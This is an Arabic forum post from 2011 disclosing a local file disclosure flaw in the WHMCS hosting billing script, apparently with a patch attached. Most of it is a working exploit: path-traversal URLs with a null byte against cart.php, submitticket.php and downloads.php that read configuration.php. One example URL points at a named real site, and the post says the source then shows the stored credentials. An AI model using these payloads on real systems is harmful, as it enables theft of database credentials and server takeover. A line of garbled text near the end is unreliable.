السلام عليكم ورحمه الله وبركاته
الثغره بسيطه ومنتشره من زمان بين الشباب ع الايميل
لكن في حد حب ينشرها لمواقع السكيورتي الله يهديه
(رح تترقع هيك الثغره )
خطوره الثغره كبيره لانك ممكن توصل للروت
الاستغلال
كود PHP:
cart.php?a=test&templatefile=../../../configuration.php%00
submitticket.php?step=test&templatefile=../../../configuration.php%00
downloads.php?action=test&templatefile=../../../configuration.php%00
بتقرا الكونفج بالسورس كود للصفحه
مثال
كود PHP:
https://storm-servers.net/whmcs/cart.php?a=test&templatefile=../../../configuration.php%00
افتح اللنك وبعد افتح السورس كود بتلقى بينات الكونفج
اتوقع الشرح مفهوم خاصه مع المثال
وترقيع الثغره بالمرفقات
ارفع المرفق بداخل سكربت whmcs
واستبدله بالملف الاصلي
بامان الله ورعايته
eyvi fs;vfj hghsjqhti WHMCompleteSolution Local File Disclosure
10-23-2011, 10:34 AM
ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع 
العرض الشجري
